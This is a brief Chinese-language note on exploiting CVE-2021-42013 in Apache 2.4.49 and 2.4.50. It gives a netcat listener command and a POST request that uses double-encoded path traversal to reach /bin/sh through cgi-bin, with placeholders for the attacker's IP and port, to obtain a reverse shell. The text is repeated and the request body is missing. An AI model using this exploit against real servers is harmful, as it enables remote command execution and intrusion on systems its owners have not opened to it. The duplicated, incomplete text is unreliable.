【笔记】CVE-2021-42013漏洞利用
前言
Apache的远程命令执行漏洞利用
漏洞利用前提
- Apache版本
2.4.49
、2.4.50
- 受害者有perl环境
漏洞利用
攻击者监听反弹Shell
1 | nc -lvp <port> |
受害者反弹Shell
<ip>
:攻击者IP地址<port>
:攻击者端口号
1 | POST http://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh |
Apache的远程命令执行漏洞利用
2.4.49
、2.4.50
1 | nc -lvp <port> |
<ip>
:攻击者IP地址<port>
:攻击者端口号
1 | POST http://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh |